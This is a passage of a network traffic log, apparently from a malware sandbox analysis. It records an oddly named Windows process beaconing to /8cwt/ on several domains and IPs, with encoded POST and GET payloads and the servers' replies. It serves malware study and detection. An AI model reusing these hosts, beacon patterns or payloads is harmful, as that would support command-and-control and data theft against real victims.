                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.nurenose.com
                                      Referer: http://www.nurenose.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=gYXxWfa9qOoqdMWa67SQA/gi1YpKvl4XF+RbzBHB6SuB8L99h16DSSSC7sAJuxbpo/eYmxBeYfLYprtZlahL6Xu/W9p2He4gGM6lBoMmV5X+9IsvWXgNbgyA2s80OluMaGQZa4AK/mC5m9Z92HDY6QGN96CMm/Gcoyqvgo8SGaZhPdA6vncLrQPp1i/BwT/wMPlTk55CLWqm779D9MKwn1o=
                                      Jun 4, 2024 14:19:41.097110033 CEST  208  IN  HTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                      39  192.168.11.30  49887  91.195.240.19  80  2980  C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp  Bytes transferred  Direction  Data
                                      Jun 4, 2024 14:19:43.621416092 CEST  1623  OUT  POST /8cwt/ HTTP/1.1
                                      Host: www.nurenose.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.nurenose.com
                                      Referer: http://www.nurenose.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX= [TRUNCATED]
                                      Jun 4, 2024 14:19:43.849981070 CEST  208  IN  HTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                      40  192.168.11.30  49888  91.195.240.19  80  2980  C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp  Bytes transferred  Direction  Data
                                      Jun 4, 2024 14:19:46.381886005 CEST  427  OUT  GET /8cwt/?24eluX=ta/RVvqxwt03TPXWzdfJPt4x66UfuVsjNv5QpTaL8gP24YNLrE30I2eSxM0VtxXCv+eA5B8kQfuz0YxEkZl7phijUbluJOwzHO73Kb9kDKOg+aMKAT0Adgs=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.nurenose.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:19:46.606271029 CEST  208  IN  HTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                      41  192.168.11.30  49889  91.195.240.123  80  2980  C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp  Bytes transferred  Direction  Data
                                      Jun 4, 2024 14:19:52.043632030 CEST  674  OUT  POST /8cwt/ HTTP/1.1
                                      Host: www.cd14j.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.cd14j.us
                                      Referer: http://www.cd14j.us/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=EKau/zgUOpakG28m3zhUhi30Wcix/Y6PS+bDr86VJoF5H7UZqhaKqw+NFh2pqJtBBUXCTCBjP0LCXq5vvKY0d0fXbAgWs45C/HjUVcq47GKmGbddsTgDbfwsZWVrYPA3yUYSHJXwB2qYW/3J2Hnr53vua+VROC9UR2T4tK1M2isPgTmN0n9H86XhjoJna7TeKg==
                                      Jun 4, 2024 14:19:52.268194914 CEST  208  IN  HTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                      42  192.168.11.30  49890  91.195.240.123  80  2980  C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp  Bytes transferred  Direction  Data
                                      Jun 4, 2024 14:19:54.801759958 CEST  694  OUT  POST /8cwt/ HTTP/1.1
                                      Host: www.cd14j.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.cd14j.us
                                      Referer: http://www.cd14j.us/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=EKau/zgUOpakHWsm2U1U2S33a8ix2461S+XDr9uFJ+15J/QZrgaKpw+NNB2WuJtGBUbgTHhjP03CXoRvu5g1b0fJQggIjY5C/HjUVfWe7GCmBrtdsxEAYfwvQ2VrPfAzyUZBHILWBwuYW7zJ22now3vSXeUGfXUAUCb7hadwzXoGokXXpkJFvarM/pkPY5SFXr81NaOWI2uy//4izMY2gAc=
                                      Jun 4, 2024 14:19:55.026315928 CEST  208  IN  HTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                      43  192.168.11.30  49891  91.195.240.123  80  2980  C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp  Bytes transferred  Direction  Data
                                      Jun 4, 2024 14:19:57.552762032 CEST  1611  OUT  POST /8cwt/ HTTP/1.1
                                      Host: www.cd14j.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.cd14j.us
                                      Referer: http://www.cd14j.us/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX= [TRUNCATED]
                                      Jun 4, 2024 14:19:57.778769016 CEST  208  IN  HTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                      44  192.168.11.30  49892  91.195.240.123  80  2980  C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp  Bytes transferred  Direction  Data
                                      Jun 4, 2024 14:20:00.301908016 CEST  423  OUT  GET /8cwt/?24eluX=JIyO8Gc0ZaCUBC4gwloHiifCYtv01LSxCuL3sMDgSuZIErE9iBbFukGcMyuYgIJjP33nSDseYz7bP5VCvKNEdyHwbE4qu9h+y1aodMHm9WSOLrl68ngvcME=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.cd14j.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:20:00.527378082 CEST  208  IN  HTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                      45  192.168.11.30  49893  192.3.27.169  80  2980  C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp  Bytes transferred  Direction  Data
                                      Jun 4, 2024 14:20:08.740225077 CEST  431  OUT  GET /8cwt/?24eluX=iQ4bGvtt1bUOdIMmx0FoKxyGgfNtaKfegGtnnpaIA0bWJs9Q4689zouPx5Y4+HL6T4TvrzgawqpIlVOGUgGREoTlcD3Zw3RnhErLbn743FaHB2O7toC+0mA=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.respirelavie.net
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:20:09.059978008 CEST  401  IN  HTTP/1.1 400 Bad Request
                                      Date: Tue, 04 Jun 2024 12:20:07 GMT
                                      Server:
                                      X-Frame-Options: SAMEORIGIN
                                      Content-Length: 150
                                      Connection: close
                                      X-XSS-Protection: 1; mode=block
                                      X-Content-Type-Options: nosniff
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                      Session ID  Source IP  Source Port  Destination IP  Destination Port
                                      46  192.168.11.30  49894  173.232.18.161  80
                                      Timestamp  Bytes transferred  Direction  Data
                                      Jun 4, 2024 14:20:14.228513002 CEST  704  OUT  POST /8cwt/ HTTP/1.1
                                      Host: www.airportsurvery.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.airportsurvery.com
                                      Referer: http://www.airportsurvery.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=HCML38UUrPa9Giksyv9KCAQTfaTX4WJKMBhdGLWzH7TaFL2K38UKKE3SE7IDXv1ymDPWihhwK/SGumcgnPcehJVqjKJflvCd6kSz1x05IYvSbJl3LkB3Zex4hj/uaFevZ66RGwXXN9OSBVbnP31nGsrcBgf7j/WFY/wbwLZ0h6O70XYidWOqsQVGNxMkjNVDFA==
                                      Jun 4, 2024 14:20:14.395673037 CEST  974  IN  HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:19:37 GMT
                                      Content-Type: text/html;charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      X-Powered-By: PHP/5.4.41
                                      Content-Encoding: gzip


                                      Session ID  Source IP  Source Port  Destination IP  Destination Port
                                      47  192.168.11.30  49895  173.232.18.161  80
                                      Timestamp  Bytes transferred  Direction  Data
                                      Jun 4, 2024 14:20:16.913436890 CEST  724  OUT  POST /8cwt/ HTTP/1.1
                                      Host: www.airportsurvery.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.airportsurvery.com
                                      Referer: http://www.airportsurvery.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=HCML38UUrPa9ACUs0O9KVwQcQ6TXjGJOMBddGJ6ZEInaFuKK29UKZ03SKbICTv19mDDeikZwK/GGumMgn4oZgZVooqJdrPCd6kSz1xwHIcDSbZV3LG52HOxngj/uLVerZ66vG0X9N4KSBVrnMjhkPsraOAeRu+zNefA979BYko6x1Ap4AV6o/wprRwhMhPUYYEO3SvtwAH/ij/3l4MBd5sQ=
                                      Jun 4, 2024 14:20:17.079696894 CEST | 974 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:19:39 GMT
                                      Content-Type: text/html;charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      X-Powered-By: PHP/5.4.41
                                      Content-Encoding: gzip


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      48 | 192.168.11.30 | 49896 | 173.232.18.161 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:20:19.598864079 CEST | 1641 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.airportsurvery.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.airportsurvery.com
                                      Referer: http://www.airportsurvery.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX= [TRUNCATED]
                                      Jun 4, 2024 14:20:19.765036106 CEST | 974 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:19:42 GMT
                                      Content-Type: text/html;charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      X-Powered-By: PHP/5.4.41
                                      Content-Encoding: gzip


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      49 | 192.168.11.30 | 49897 | 173.232.18.161 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:20:22.285574913 CEST | 433 | OUT | GET /8cwt/?24eluX=KAkr0JsC36DOGBdb86MaWw8oa5TA2XZrFg5SI4PSAqjqBay0+Mt9GFSkKu0kcsR0pRjPiVoCFffv9kAFnu4p94pvlKRDsoyD63jLrTdFBvrOG4BRdTojXfc=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.airportsurvery.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:20:22.451523066 CEST | 1289 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:19:45 GMT
                                      Content-Type: text/html;charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      X-Powered-By: PHP/5.4.41
                                      Data Ascii: 48c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title></title><script src="/jquery.min.js" ></script></head><body><h1><a href="/" title=''></a></h1><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache Server at www.meas-elec.com Port 80</address><div style="clear:both;padding:10px;text-align:center;margin:5"><a href="/airportsurvery.com.xml" target="_blank">XML </a> | <a href="/airportsurvery.com.html" target="_blank">Sitemap </a></div><script> (function(){var bp = document.createElement('script');var curProtocol = window.location.protocol.split(':')[0];if (curProtocol === 'https') {bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';}else{bp.src = ' [TRUNCATED]
                                      Jun 4, 2024 14:20:22.451534986 CEST | 93 | IN |
                                      Data Ascii: yTagName("script")[0];s.parentNode.insertBefore(bp, s); })(); </script></body></html>0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      50 | 192.168.11.30 | 49898 | 203.161.49.193 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:20:27.630053997 CEST | 692 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.innovtech.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.innovtech.life
                                      Referer: http://www.innovtech.life/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=fQBmmYz6qvK+Df7e1oZBiBxqcJzczsT97uC9AR5ugLcnOOuqquvzqVbbrW0o0NvIe025nx9EjDbswrTs++QIHPIiDKfI97I/04KsjAMUN5GdLcourF3WeKC6w6Yk/Cwvnf4dYr0Xd5pvjLS/Jtw+INHAt94UFRkzVBZPnkIf4fFIYv3G4ncoCpW0gxKX3CQ0kA==
                                      Jun 4, 2024 14:20:27.806950092 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:20:27 GMT
                                      Server: Apache
                                      Content-Length: 389
                                      Connection: close
                                      Content-Type: text/html
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      51 | 192.168.11.30 | 49899 | 203.161.49.193 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:20:30.331979036 CEST | 712 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.innovtech.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.innovtech.life
                                      Referer: http://www.innovtech.life/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=fQBmmYz6qvK+C+LezPtB3Rx1Qpzcm8TD7ue9AQ9Hh44nOveq4sHztVbbl20twNvBe06fn19EjDPswqjs+t4LFfIgWafKwbI/04KsjBo6N9SdLtYuqhjZFqC55aYksSwjnf54Yq5Md7BvjO2/J/YhTdHCwN5GM0RNVDY92WYl/eZ9d4GclkoqRJqZ8wn/1ARv5MDR+oTogwORrkVGqc/PxcM=
                                      Jun 4, 2024 14:20:30.518039942 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:20:30 GMT
                                      Server: Apache
                                      Content-Length: 389
                                      Connection: close
                                      Content-Type: text/html
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      52 | 192.168.11.30 | 49900 | 203.161.49.193 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:20:33.032955885 CEST | 1629 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.innovtech.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.innovtech.life
                                      Referer: http://www.innovtech.life/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX= [TRUNCATED]
                                      Jun 4, 2024 14:20:33.216226101 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:20:33 GMT
                                      Server: Apache
                                      Content-Length: 389
                                      Connection: close
                                      Content-Type: text/html
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      53 | 192.168.11.30 | 49901 | 203.161.49.193 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:20:35.735954046 CEST | 429 | OUT | GET /8cwt/?24eluX=SSpGlvD+1syJM+fS7Z8C1Cd2ZLeBmOr+68qPZxMelqgcCM6DsfmVmmLjkXM2/P+9S0q4oxoduwfupYzMqMwdcdYcBeP38sFbk5TUrAJPEOGdI/gD7BvPJp4=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.innovtech.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:20:35.910913944 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:20:35 GMT
                                      Server: Apache
                                      Content-Length: 389
                                      Connection: close
                                      Content-Type: text/html; charset=utf-8
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      54 | 192.168.11.30 | 49902 | 91.195.240.123 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:20:41.154891968 CEST | 674 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.k4ryd.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.k4ryd.us
                                      Referer: http://www.k4ryd.us/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=9LLMoauWOkuQL/qjNZU+iA1k6M3dI+E6eIBxE4bRbgLk94XG7i+QWU+7qTPk/LmJFUydEvazl1sN+2xc7gsuY9Rzj23GGhbz5eBqzDLrpJq7DfazVbM0fv9epU0L47xl18hk8dnM1xN3Hp9UAMr0yq7DaEebqXFLlutB8qdt3ixpaAG6Y+RVWhMGiGmc2GBuYA==
                                      Jun 4, 2024 14:20:41.379555941 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      55 | 192.168.11.30 | 49903 | 91.195.240.123 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:20:43.924374104 CEST | 694 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.k4ryd.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.k4ryd.us
                                      Referer: http://www.k4ryd.us/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=9LLMoauWOkuQKcCjM6s+kg1n/M3dHeEAeIdxE8CWbWzk9ZnG0AWQY0+7zjPbwrmSFU/gEvmzl1oN+2hc6XwvJ9R1qW3EIBbz5eBqzDPNpJy7DPKzW6MrB/9Bh00L87xh18hW8ZHq10J3HtxUA+D34q7BE0f+5HRFkuJdypA05CdLS33gF9lXFBwr+HL00EA1FDFmEjpfuNiVFoTgOmX5fDE=
                                      Jun 4, 2024 14:20:44.156729937 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      56 | 192.168.11.30 | 49904 | 91.195.240.123 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:20:46.683096886 CEST | 1611 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.k4ryd.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.k4ryd.us
                                      Referer: http://www.k4ryd.us/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:20:46.909781933 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      57 | 192.168.11.30 | 49905 | 91.195.240.123 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:20:49.432606936 CEST | 423 | OUT | GET /8cwt/?24eluX=wJjsrv+xTFW5EezvLu5DoT5e4On1D8g+dr15EOXITWTD1anv0RLrfGS01TvW8pCuGmfcOvvelUpztksk4WpfZfFxijTtARXG8NIL7Taa8Kq3eoSsUv86NcY=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.k4ryd.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:20:49.658915997 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
